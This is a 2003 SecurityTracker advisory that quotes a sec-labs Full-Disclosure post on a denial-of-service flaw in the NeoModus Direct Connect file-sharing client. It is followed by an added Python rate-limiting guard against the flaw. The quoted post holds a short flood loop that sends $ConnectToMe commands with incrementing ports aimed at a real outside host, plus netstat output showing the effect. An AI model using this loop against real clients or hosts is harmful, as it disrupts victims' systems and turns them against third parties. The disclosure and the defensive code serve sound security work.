NeoModus Direct Connect Permits Remote Denial of Service Attacks
SecurityTracker Alert ID: 1007186
SecurityTracker URL: http://securitytracker.com/id/1007186
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jul 14 2003
Impact:
Denial of service via network
Version(s): 1.0 build 9 tested; possibly the 1.0 build 9.1 version
Description:
A resource consumption vulnerability was reported in the NeoModus Direct Connect file sharing application. A remote user can cause denial of service conditions on the target system.
sec-labs team reported that a remote user can cause a connected target user's system to open a large number of connections to a specified port on a specified host with a command of the following format:
$ConnectToMe <U's username> <D's IP and port>|
This will reportedly cause denial of service conditions on the target user's system.
Only the Windows version was tested.
Impact:
A remote user can cause a large number of connections to be opened by the target user's system, resulting in resource starvation and denial of service conditions.
Solution:
No solution was available at the time of this entry.
Vendor URL: www.neo-modus.com/
Cause:
Resource error, State error
Underlying OS:
Windows (Any)
Message History:
None.
Source Message Contents
Date: Mon, 14 Jul 2003 13:37:19 +0000
Subject: [Full-Disclosure] [sec-labs] Remote Denial of Service vulnerability in NeoModus
sec-labs team proudly presents:
Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
and probably newest version.
by Lord YuP
13/07/2003
I. BACKGROUND
Direct Connect is a Windows (I've also found a Linux version but
I don't have time to test it) p2p file-sharing program, well
common nowadays.
II. DESCRIPTION
According to aDe, the DC client-to-client handshake looks like:
Client <-> Client Communication in DC. 11-05-2002. By aDe
----------------------------------------------------------
ACTIVE FILE DOWNLOAD
----------------------
D = downloader
U = uploader
H = hub
D>H: $ConnectToMe <U's username> <D's IP and port>|
H>U: $ConnectToMe <U's username> <D's IP and port>|
...bla bla ... ;)
As you can guess, the Direct Connect client, after receiving the
"$ConnectToMe..." command from the hub, tries to connect to the
specific IP and PORT sent by the downloader.
The attacker (evil downloader) can send infinite requests
to the HUB with a specific marked ip:port, causing a DoS attack
on the victim's client.
Little example:
Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }
Client: (ran "netstat -a")
TCP jin:1993 JIN:0 LISTENING
TCP jin:1995 JIN:0 LISTENING
TCP jin:1996 JIN:0 LISTENING
TCP jin:2005 JIN:0 LISTENING
TCP jin:2006 JIN:0 LISTENING
TCP jin:2007 JIN:0 LISTENING
TCP jin:2008 JIN:0 LISTENING
TCP jin:2009 JIN:0 LISTENING
TCP jin:2010 JIN:0 LISTENING
TCP jin:2011 JIN:0 LISTENING
TCP jin:2012 JIN:0 LISTENING
TCP jin:2013 JIN:0 LISTENING
TCP jin:2014 JIN:0 LISTENING
TCP jin:2015 JIN:0 LISTENING
TCP jin:2016 JIN:0 LISTENING
TCP jin:2017 JIN:0 LISTENING
TCP jin:2018 JIN:0 LISTENING
TCP jin:2019 JIN:0 LISTENING
...and so on...
III. IMPACT
The attacked client may be DoS-ed: the internet connection
can be reset/stopped, some clients may flood with "Out of Memory"
msgboxes, the system may not work correctly, and the DC
client may be terminated.
--
sec-labs team [http://sec-labs.hack.pl]
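The advisory lists the cause as a resource and state error: the client opens one outbound connection per relayed $ConnectToMe with no bound on how many are in flight. The following is an added illustration, not code from NeoModus, SecurityTracker or the sec-labs post, of a hypothetical client-side guard that parses the quoted command format, refuses a second attempt to the same peer address while one is pending, and caps accepted attempts per sliding window; the nick, addresses and limits are constructed.

```python
import re
from collections import deque

# Matches the command the advisory quotes, "$ConnectToMe <U's username> <D's IP and port>|",
# with the address written as dotted-quad IPv4 plus a decimal port.
CONNECT_TO_ME = re.compile(r"^\$ConnectToMe (\S+) (\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\|$")


class ConnectToMeGuard:
    """Hypothetical client-side filter for hub-relayed $ConnectToMe commands.

    Two checks (assumed hardening, not NeoModus behaviour): never hold more than one
    pending outbound attempt per peer address, and cap attempts per sliding window.
    """

    def __init__(self, my_nick, max_per_window=8, window_s=10.0):
        self.my_nick = my_nick
        self.max_per_window = max_per_window
        self.window_s = window_s
        self.pending = set()        # (host, port) pairs with a connect in flight
        self.attempts = deque()     # timestamps of accepted attempts

    def handle(self, frame, now):
        """Return 'accept' or 'reject:<reason>' for one frame seen at clock time `now`."""
        m = CONNECT_TO_ME.match(frame)
        if not m:
            return "reject:malformed"
        nick, host, port = m.group(1), m.group(2), int(m.group(3))
        if nick != self.my_nick:
            return "reject:not-for-me"        # hub relayed something addressed elsewhere
        if not 1 <= port <= 65535 or any(int(o) > 255 for o in host.split(".")):
            return "reject:bad-address"
        if (host, port) in self.pending:
            return "reject:duplicate"         # one attempt per peer address at a time
        while self.attempts and now - self.attempts[0] > self.window_s:
            self.attempts.popleft()           # forget attempts older than the window
        if len(self.attempts) >= self.max_per_window:
            return "reject:rate-limited"      # the flood case the advisory describes
        self.attempts.append(now)
        self.pending.add((host, port))
        return "accept"

    def connection_done(self, host, port):
        """Call when the outbound attempt completes or times out."""
        self.pending.discard((host, port))


def simulate_flood(count, my_nick="victim", max_per_window=8):
    """Feed `count` constructed frames with increasing ports at the same instant and
    return (accepted, rate_limited), mirroring the advisory's incrementing-port loop."""
    guard = ConnectToMeGuard(my_nick, max_per_window=max_per_window)
    results = [guard.handle(f"$ConnectToMe {my_nick} 10.0.0.1:{2000 + i}|", now=0.0)
               for i in range(count)]
    return results.count("accept"), results.count("reject:rate-limited")
```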